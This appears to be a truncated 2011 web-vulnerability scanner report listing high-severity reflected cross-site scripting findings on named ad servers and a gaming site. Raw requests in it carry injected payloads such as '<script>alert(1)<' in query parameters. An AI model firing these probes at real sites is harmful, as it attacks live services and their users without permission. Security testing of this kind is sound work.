HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 8279 Cache-Control: no-cache Pragma: no-cache Date: Mon, 16 May 2011 12:53:06 GMT Expires: Mon, 16 May 2011 12:53:06 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JTNDL3NjcmlwdCUzRWJl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 8279 Cache-Control: no-cache Pragma: no-cache Date: Mon, 16 May 2011 12:53:02 GMT Expires: Mon, 16 May 2011 12:53:02 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JTNDL3NjcmlwdCUzRWJl var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2FmZS5jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2FmZS5jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 29raWUpJTNDL3Njcmlwd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 29raWUpJTNDL3Njcmlwd var fscUrl = url; var fscUrlClickTagFound = false; var wmo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JpcHQlM0VhbGVydChkb2 var fscUrl = url; var fscUrl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:50 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JpcHQlM0VhbGVydChkb2 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3b09/f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3220.no_url |
GET /adj/N3220.no_url Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.metacafe.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:52:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8333 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3b09/f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7545 Cache-Control: no-cache Pragma: no-cache Date: Mon, 16 May 2011 12:50:46 GMT Expires: Mon, 16 May 2011 12:50:46 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JTNDL3NjcmlwdCUzRWJl var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7537 Cache-Control: no-cache Pragma: no-cache Date: Mon, 16 May 2011 12:50:51 GMT Expires: Mon, 16 May 2011 12:50:51 GMT document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JTNDL3NjcmlwdCUzRWJl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7548 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2FmZS5jb20vZnBsYXllci8 var fscUrl = url; var fscUrlClickTagFound = fal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7543 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2FmZS5jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 29raWUpJTNDL3Njcmlwd var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7548 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 29raWUpJTNDL3Njcmlwd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:22 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... jb20vZnBsYXllci8 var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7555 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 18:03:37 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... jb20vZnBsYXllci8 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7543 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JpcHQlM0VhbGVydChkb2 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7543 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... JpcHQlM0VhbGVydChkb2 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7547 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3b09/f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N763.metacafecom |
GET /adj/N763.metacafecom Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacafe.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 16 May 2011 12:50:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551 document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3b09/f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.yieldmanager |
Path: | /st |
GET /st?ad_type=ad&ad_size Host: ad.yieldmanager.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://d.tradex.openx.com Cookie: BX=ek8k2sl67ofpa&b=4&s=o9 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:52:33 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 16 May 2011 12:52:33 GMT Pragma: no-cache Content-Length: 4324 Age: 0 Proxy-Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bid.openx.net |
Path: | /json |
GET /json?c=OXM_6670393876aba86<script>alert(1)< Host: bid.openx.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://d.tradex.openx.com Cookie: i=de6f5b1d-dd7a-4d95-8142 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cache-Control: no-cache, must-revalidate P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Set-Cookie: s=282eed89-72f0-45c6-8111 Set-Cookie: p=1305550335; version=1; path=/; domain=.openx.net; max-age=63072000; OXM_6670393876aba86<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rtb50.doubleverify |
Path: | /rtb.ashx/verifyc |
GET /rtb.ashx/verifyc?ctx Host: rtb50.doubleverify.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://d.tradex.openx.com |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.0 Date: Mon, 16 May 2011 12:52:00 GMT Connection: close Content-Length: 74 __verify_callback |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USDf52a7"><script>alert(1)< Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:26 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/ Set-Cookie: currency=USDf52a7%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD737fc"%3balert(1)/ Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:27 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/ Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <script type="text/javascript"> $(document).ready flashembed("middleflash", {src: "/images/scratch3a.swf monthlyprizetext: 'Won Last Month', monthlyprize: '£53,521,715', topprizetext: 'Scratch £ ...[SNIP]... |
Severity: | High |
